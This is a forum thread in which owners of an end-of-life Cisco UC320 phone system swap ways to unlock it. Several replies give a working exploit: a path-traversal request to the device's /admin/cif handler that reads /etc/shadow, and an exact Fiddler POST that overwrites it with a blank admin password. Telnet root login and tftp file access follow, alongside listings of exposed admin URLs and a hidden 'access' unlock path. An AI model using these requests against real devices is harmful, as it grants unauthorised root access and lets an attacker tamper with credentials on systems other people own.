cancel
Showing results for 
Search instead for 
Did you mean: 
cancel
Announcements
1782
Views
0
Helpful
29
Replies
Highlighted

UC320 EOL - Unock?

Hi,

Does anyone know if there is any chance that CISCO will unlock our boxes after they stop selling/supporting the product?

Regards,

Paul.

29 REPLIES 29
Highlighted

You must authorize before it.

I used Fiddler for that.

Highlighted

I can't work out your admin access - I'm missing something, but have you played around with the privilege levels in the config.xml to see if it enables the hidden web pages?

- <Privilege_Control>
  <WAN_Internet_Setup>2</WAN_Internet_Setup>
  <WAN_Mobile_Network>2</WAN_Mobile_Network>
  <WAN_Failover_Recovery>2</WAN_Failover_Recovery>
  <LAN_DHCP_Server_Pool_Setting>2</LAN_DHCP_Server_Pool_Setting>
  <LAN_Bridge_VLAN_Setting>2</LAN_Bridge_VLAN_Setting>
  <LAN_Port_Setting>2</LAN_Port_Setting>
  <Wireless_Basic_Settings>2</Wireless_Basic_Settings>
  <Wireless_Protected_Setup>2</Wireless_Protected_Setup>
  <Wireless_MAC_Filter>2</Wireless_MAC_Filter>
  <Wireless_Advanced_Setting>2</Wireless_Advanced_Setting>
  <WMM_Setting>2</WMM_Setting>
  <Loopback_Interface>2</Loopback_Interface>
  <Static_Route_Rule>2</Static_Route_Rule>
  <RIP>2</RIP>
  <Intervlan_Routing>2</Intervlan_Routing>
  <NAT_Setting>2</NAT_Setting>
  <Port_Forwarding>2</Port_Forwarding>
  <Port_Range_Triggering>2</Port_Range_Triggering>
  <QoS_Bandwidth_Control>2</QoS_Bandwidth_Control>
  <QoS_Policy>2</QoS_Policy>
  <QoS_ToS_Control>2</QoS_ToS_Control>
  <QoS_DSTP_Control>2</QoS_DSTP_Control>
  <Firewall_Filter>2</Firewall_Filter>
  <Internet_Access_Control>2</Internet_Access_Control>
  <PPPoE_Relay>2</PPPoE_Relay>
  <DDNS>2</DDNS>
  <DMZ>2</DMZ>
  <IGMP>2</IGMP>
  <UPnP>2</UPnP>
  <CDP>2</CDP>
  <Voice>2</Voice>
  <IKE_Policy>2</IKE_Policy>
  <IPSec_Policy>2</IPSec_Policy>
  <GRE_Tunnel>2</GRE_Tunnel>
  <VPN_Passthrough>2</VPN_Passthrough>
  <Web_Access_Management>0</Web_Access_Management>
  <Remote_Debug>0</Remote_Debug>
  <TR_069>0</TR_069>
  <SNMP>0</SNMP>
  <Local_TFTP>0</Local_TFTP>
  <License_Installation>0</License_Installation>
  <License_Summary>0</License_Summary>
  <License_Detail>0</License_Detail>
  <License_Resend>0</License_Resend>
  <License_Device_Credential>0</License_Device_Credential>
  <Time_Setup>2</Time_Setup>
  <User_List>0</User_List>
  <Log>0</Log>
  <Factory_Defaults>0</Factory_Defaults>
  <Firmware_Upgrade>0</Firmware_Upgrade>
  <Backup_Configuration>0</Backup_Configuration>
  <Restore_Configuration>0</Restore_Configuration>
  <VM_System_Backup>0</VM_System_Backup>
  <VM_System_Restore>0</VM_System_Restore>
  <Reboot>0</Reboot>
  <System_Status>0</System_Status>
  <Switch_Setting>0</Switch_Setting>
  <Voice_Setting>0</Voice_Setting>
  <Ping_Test>2</Ping_Test>
  <Traceroute_Test>2</Traceroute_Test>
  <Detect_Active_LAN_Clients>0</Detect_Active_LAN_Clients>
  <Router_Status>2</Router_Status>
  <Firewall_Status>2</Firewall_Status>
  <Interface_Information>2</Interface_Information>
  <Wireless_Network_status>2</Wireless_Network_status>
  <Wireless_Client_Information>2</Wireless_Client_Information>
  <Mobile_Network_Status>2</Mobile_Network_Status>
  <DHCP_Server_Information>2</DHCP_Server_Information>
  <QoS_Status>2</QoS_Status>
  <Routing_Table>2</Routing_Table>
  <ARP_Table>2</ARP_Table>
  <RIP_Status>2</RIP_Status>
  <IGMP_Status>2</IGMP_Status>
  <VPN_Status>2</VPN_Status>
  <CDP_Neighbor_Information>2</CDP_Neighbor_Information>
Highlighted

At first I was trying to change this file, there was no result.

May be it will interesting for you:

http://192.168.10.1/admin/config.xml

http://192.168.10.1/admin/status.xml

same files in other paths:

http://192.168.10.1/wizard/status.xml

http://192.168.10.1/usbwizard/status.xml

 

demon httpd in attachment

Files of ~/www/wizard/

~/www/wizard/AC_OETags.js
~/www/wizard/askfordevmode.html
~/www/wizard/cisco_logo_header.png
~/www/wizard/data
~/www/wizard/framework_3.5.0.12683.swf
~/www/wizard/framework_3.5.0.12683.swz
~/www/wizard/images
~/www/wizard/javascript
~/www/wizard/pageBackground.jpg
~/www/wizard/PhoneBoothHelp.html
~/www/wizard/playerProductInstall.swf
~/www/wizard/sckq4.swf
~/www/wizard/setupwizard.html
~/www/wizard/UC320W_Introduction.swf
~/www/wizard/UC320W_Introduction_de.swf
~/www/wizard/UC320W_Introduction_es.swf
~/www/wizard/UC320W_Introduction_fr.swf
~/www/wizard/UC320W_Introduction_it.swf
~/www/wizard/UC320W_Introduction_pt.swf
~/www/wizard/upgradeApp.js
~/www/wizard/version.txt
~/www/wizard/data/localization
~/www/wizard/data/localization/de_DE.xml
~/www/wizard/data/localization/en_US.xml
~/www/wizard/data/localization/es_ES.xml
~/www/wizard/data/localization/fr_FR.xml
~/www/wizard/data/localization/it_IT.xml
~/www/wizard/data/localization/last_drop
~/www/wizard/data/localization/pt_BR.xml
~/www/wizard/data/localization/pt_PT.xml
~/www/wizard/data/localization/last_drop/.svn
~/www/wizard/data/localization/last_drop/notes
~/www/wizard/data/localization/last_drop/.svn/all-wcprops
~/www/wizard/data/localization/last_drop/.svn/entries
~/www/wizard/data/localization/last_drop/.svn/prop-base
~/www/wizard/data/localization/last_drop/.svn/props
~/www/wizard/data/localization/last_drop/.svn/text-base
~/www/wizard/data/localization/last_drop/.svn/tmp
~/www/wizard/data/localization/last_drop/.svn/text-base/notes.svn-base
~/www/wizard/data/localization/last_drop/.svn/tmp/prop-base
~/www/wizard/data/localization/last_drop/.svn/tmp/props
~/www/wizard/data/localization/last_drop/.svn/tmp/text-base
~/www/wizard/images/systemmap
~/www/wizard/images/systemmap/network
~/www/wizard/images/systemmap/site
~/www/wizard/images/systemmap/telephony
~/www/wizard/images/systemmap/network/Network_LAN2.png
~/www/wizard/images/systemmap/network/Network_PortForwarding2.png
~/www/wizard/images/systemmap/network/Network_Topology2.png
~/www/wizard/images/systemmap/network/Network_WAN2.png
~/www/wizard/images/systemmap/network/Network_Wireless2.png
~/www/wizard/images/systemmap/site/Site_Backup2.png
~/www/wizard/images/systemmap/site/Site_Region2.png
~/www/wizard/images/systemmap/site/Site_SystemAccess2.png
~/www/wizard/images/systemmap/telephony/CallRouting_AutoAttendant2.png
~/www/wizard/images/systemmap/telephony/CallRouting_CallPaging2.png
~/www/wizard/images/systemmap/telephony/CallRouting_HuntGroups2.png
~/www/wizard/images/systemmap/telephony/CallRouting_InboundCalls2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_AdditionalExtensions2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_SharedExtensions2.png
~/www/wizard/images/systemmap/telephony/ExtensionButtons_SharedFXOLines2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_FXSPorts2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_LineFXOPorts2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_OutboundTrunks2.png
~/www/wizard/images/systemmap/telephony/PortsandTrunks_SIPBRITrunks2.png
~/www/wizard/images/systemmap/telephony/Telephony_DayNightFeatures2.png
~/www/wizard/images/systemmap/telephony/Telephony_Devices2.png
~/www/wizard/images/systemmap/telephony/Telephony_InternalDialing2.png
~/www/wizard/images/systemmap/telephony/Telephony_Music2.png
~/www/wizard/images/systemmap/telephony/Telephony_PBXKeySystem2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_CallForwarding2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_Directory2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_PhoneButtonLabels2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_PhoneButtons2.png
~/www/wizard/images/systemmap/telephony/UserGroupFeatures_VoicemailtoEmail2.png
~/www/wizard/images/systemmap/telephony/UsersPhones_AssignPhones2.png
~/www/wizard/images/systemmap/telephony/UsersPhones_Users2.png
~/www/wizard/javascript/ajaxfileupload.js
~/www/wizard/javascript/bgstretcher.css
~/www/wizard/javascript/bgstretcher.js
~/www/wizard/javascript/images
~/www/wizard/javascript/jquery-ui.custom.css
~/www/wizard/javascript/jquery-ui.js
~/www/wizard/javascript/jquery.js
~/www/wizard/javascript/upgrade_firmware
~/www/wizard/javascript/images/ui-bg_flat_0_aaaaaa_40x100.png
~/www/wizard/javascript/images/ui-bg_flat_75_ffffff_40x100.png
~/www/wizard/javascript/images/ui-bg_glass_55_fbf9ee_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_65_ffffff_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_75_dadada_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_75_e6e6e6_1x400.png
~/www/wizard/javascript/images/ui-bg_glass_95_fef1ec_1x400.png
~/www/wizard/javascript/images/ui-bg_highlight-soft_75_cccccc_1x100.png
~/www/wizard/javascript/images/ui-icons_222222_256x240.png
~/www/wizard/javascript/images/ui-icons_2e83ff_256x240.png
~/www/wizard/javascript/images/ui-icons_454545_256x240.png
~/www/wizard/javascript/images/ui-icons_888888_256x240.png
~/www/wizard/javascript/images/ui-icons_cd0a0a_256x240.png
~/www/wizard/javascript/upgrade_firmware/locale_de_de.js
~/www/wizard/javascript/upgrade_firmware/locale_en_us.js
~/www/wizard/javascript/upgrade_firmware/locale_es_es.js
~/www/wizard/javascript/upgrade_firmware/locale_fr_fr.js
~/www/wizard/javascript/upgrade_firmware/locale_it_it.js
~/www/wizard/javascript/upgrade_firmware/locale_pt_br.js
~/www/wizard/javascript/upgrade_firmware/locale_pt_pt.js
~/www/wizard/javascript/upgrade_firmware/main.js
~/www/wizard/javascript/upgrade_firmware/styles.css

All files accessible via http, for example:

http://192.168.10.1/wizard/javascript/upgrade_firmware/styles.css

Highlighted

how did you use fiddler? Using the composer I sent

POST http://192.168.10.1/admin/cif?file=/../../etc/shadow&xuser=admin&xpassword=123456789 HTTP/1.1
Accept: */*
Referer: http://192.168.10.1/admin/cif?file=/../../etc/shadow
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Host: 192.168.10.1
DNT: 1
Connection: Keep-Alive
Pragma: no-cache
Cookie: dev_disable_warning=true; dev_mode=Integration

admin::0:0:99999:7:::

 

but keep coming back its blanked out the shadow file

Highlighted

First you must logon in web gui by any browser. After take Fiddler and go to:

"Composer" tab -> "Parsed" tab:

POST — http://192.168.10.1/admin/cif?file=/../../etc/shadow

or if you not login before — LOGIN - your login and PASSWORD - your password

http://192.168.10.1/admin/cif?file=../../etc/shadow&xuser=LOGIN&xpassword=PASSWORD

Request body:

admin::0:0:99999:7:::

 

Execute

Highlighted

OK got it was putting admin::0:0:99999:7::: in the wrong area

Highlighted

Fiddler required RTFM? :)

You can use PASSWD by telnet for seting new password.

P.S. After rebooting your device password will be set to factory default.

P.P.S. By default web admin accessible only from LAN network and blocked from WAN&WiFi.

Highlighted

This files located in ~/www/, but is not accessible from httpd server.

*It's web admin of SRP520 series.

Highlighted

I decided to share achievements, still on the Cisco S & B shit a long time, I think they should pay special attention. Sources with them, asking several times, but they stupidly silent.

 

I am too lazy too lazy to translate into English, otherwise I would not tweeted yet. Whom it is necessary to understand.

 

What is available via httpd:

http://192.168.10.1/askfordevmode.html

http://192.168.10.1/wizard/askfordevmode.html

 

Only after login:

http://192.168.10.1/admin/voice/

http://192.168.10.1/admin/cif

 

Now the fun part. Cif process launched with root privileges, and can work with the file system. This makes it possible to obtain a directory listing, read files, and even writing.

Queries are as follows:

http://192.168.10.1/admin/cif?dir= - will give the entire contents of the directory ~/home/usb_disk

 

http://192.168.10.1/admin/cif?file=pb_db.txt - as well as text , we get all the contents of the file ~/home/usb_disk/pb_db.txt

 

Attention to the question, and one we get the contents of the file meshat shadow? Yes, no one!

 

http://192.168.10.1/admin/cif?file=/../../etc/shadow

 

List of salt and we already have. Password for uchetku admin generated and written every time you start the device, which is a bit inconvenient. Salt always alone, then the password is always the same. He created based on the MAC address of the device, but the principle is unknown to me. Instead, reset it to us no one interferes, although this should be done every time you restart.

 

Create a query with the contents:

 

admin::0:0:99999:7:::

 

And by POST method through HTTP send it on the link above. Then take telnet and connect to it by entering the user name admin, password, he will not ask.

 

Then using busybox, or rather its wrapper tar and tftp can quickly receive and upload files to the device.

 

The entire configuration is stored in XML. I describe where something:

 

~/home/usb_disk/cfg/misc/dynamicconfig.xml — options flash wizard

~/home/usb_disk/cfg/locales/ — region packs in XML and dictionaries for IP phones

 

~/home/usb_disk/tftproot/ — folder from which IP phones receive information about the firmware. These files are loaded first IP phones, after receiving information on the DHCP address of the TFTP server

 

~/home/usb_disk/cfg/firmware/ - directory with phone firmware

 

This is the most important, and the rest describe the sense not see, will understand already own.

 

If someone will pick httpd, it can be noted that it mounts on startup container ~/home/usb_disk/wz.fs with read-only access to the directory ~/www/wizard/

 

I ask if any other operating time not to forget to share them with others.

 

P.S. If anyone will be able to, collect SSH for him for more convenient access for SFTP, all auxiliary components are already there. I still do not own up to it.

 

 

 

Highlighted

You can request the source code directly from cisco - if you are interested.

Highlighted

That'll only be the FOSS stuff, unlikely to be that interesting. Just the usual kernel and busybox stuff. It is trivial to get shell access though, loads of injection potential in the web interface (including R/W access to the filesystem through a nice API!)

Highlighted

yes I had a look through it a couple of years ago and there wasn't anything that would help unlock the device

Highlighted
Beginner

The best I can give is this :

 

Go to :

http://IPOFYOURDEVICE/access/cf12cbd16 

I don't know if that code is unique though.

I my case, this opens a page where it says 

OK (200)

Advanced Pages Unlocked

 

Then you go on http://IPOFYOURDEVICE/voice.asp

 

To turn off advanced pages : http://IPOFYOURDEVICE/access/OFF

Highlighted

Thanks, but it doesn't work on mine. 404 error

Highlighted

doesn't work for me.  anyway, thank you very much